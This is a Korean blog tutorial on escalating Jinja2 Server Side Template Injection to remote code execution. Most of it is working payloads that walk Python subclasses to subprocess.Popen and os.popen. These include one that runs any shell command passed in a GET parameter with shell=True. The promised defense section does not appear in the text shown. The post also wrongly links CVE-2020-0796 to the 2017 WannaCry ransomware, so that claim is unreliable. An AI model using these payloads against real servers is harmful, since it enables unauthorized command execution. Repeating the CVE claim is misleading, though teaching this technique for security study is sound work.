SSTI - RCE(Remote Code Execution) 연계 공격

SSTI(Server Side Template Injection)을 통한 여러 공격 갈래 중 하나를 알아볼까 합니다.

 

우선, SSTI가 생소하다면 이전 포스팅을 보고오시는 것을 추천드립니다.

2023.09.12 - [web hacking/techniques] - SSTI 기본 개념과 예제 실습

SSTI 기본 개념과 예제 실습

 

 

RCE(Remote Code Execution)이란, 인가받지 않은 공격자가 악성코드를 서버에서 원격으로 실행시키는 공격입니다.

대표적인 예로는 윈도 SMBv3 취약점(CVE-2020-0796)이 있는데, 해당 취약점의 경우 2017년 'Wannacry' 랜섬웨어 배포와 깊은 관련이 있었습니다.

 

 

 

이번 포스팅에서는 SSTI 취약점을 이용하여 원격으로 쉘을 실행시키고 그 결과를 받아보는 실습을 진행해 볼것입니다.

디테일한 공격 과정을 거치고, 이를 방어할 수 있는 방법을 살펴보도록 합시다.

 

 

 

세부 공격 과정

subprocess.Popen호출과 함께 세부 공격 코드에 관해 자세히 보겠습니다.

저번 포스팅에 이어서 {{ ''.__class__.__mro__[1].__subclasses__() }} 를 통해 사용할 클래스들을 탐색해 봅시다.

 

img_1 available subclasses

 

subprocess는 새로운 프로세스를 생성 및 입력/출력/에러 파이프에 연결 가능하게 해줍니다.

해당 모듈의 하부 프로세스 생성과 처리를 담당하는 Popen을 호출하여 우리가 원하는 명령을 실행 시킬 수 있습니다.

자세한 내용은 아래 링크를 확인해 보시길 바랍니다.

https://docs.python.org/ko/3/library/subprocess.html

subprocess — Subprocess management

 

 

저의 경우에는 426번 index에 클래스가 존재합니다.

{{''.__class__.__mro__[1].__subclasses__()[426]('ls')}}

우선, Popen('ls')의 결과를 한번 살펴볼까요?

 

img_2 result of subprocess.popen('ls')

 

img_2에서 볼 수 있듯이 원하는 결과는 나오지 않습니다.

하지만, 서버 확인을 해보니 쉘 명령이 서버 쪽에서 실행되었음을 알 수 있습니다.

 

 

 

 

 

return 값으로 결과를 받아보기 위해선 communicate 매서드를 활용하면 가능합니다.

{{''.__class__.__mro__[1].__subclasses__()[426]('ls').communicate()}}

아래 img_3과 같이 communicate 매서드는 튜플 (stdout_data, stderr_data)를 반환합니다.

img_3 return value of communicate method

 

 

 

 

 

이어서 Popen의 인자에 stdout=-1를 추가해 줌 으로서, 결과값을 받아볼 수 있습니다.

{{''.__class__.__mro__[1].__subclasses__()[426]('ls',stdout=-1).communicate()}}

stdout=-1에서 값, -1은 단지 PIPE를 의미하는 값입니다. 아래 문서를 참고해주세요.

https://github.com/python/cpython/blob/3.10/Lib/subprocess.py#L259

 

img_4 rce ret value

 

위와같이 성공적으로 쉘 결과값을 받아 볼 수 있습니다.

추가로 Shell=True를 넣어주면 지정된 명령이 shell을 통해 실행되게 됩니다.

 

 

 

{{''.__class__.__mro__[1].__subclasses__()[426](request.args.get('shell'),stdout=-1,shell=True).communicate()}}

여기서 get 파라미터를 이용하여 자유자재로 shell 명령을 이용할 수도 있습니다.

img_5 using get parameter

 

subprocess.Popen 말고도 다양한 라이브러리를 통한 공격이 가능합니다. 아래는 그 예시입니다.

# warnings.catch_warnings
{{ ''.__class__.__mro__[1].__subclasses__()[134].__init__.__globals__['sys'].modules['os'].popen('ls').read() }}

# cycler, joiner, namespace
{{ cycler.__init__.__globals__.os.popen('ls').read() }}
{{ joiner.__init__.__globals__.os.popen('ls').read() }}
{{ namespace.__init__.__globals__.os.popen('ls').read() }}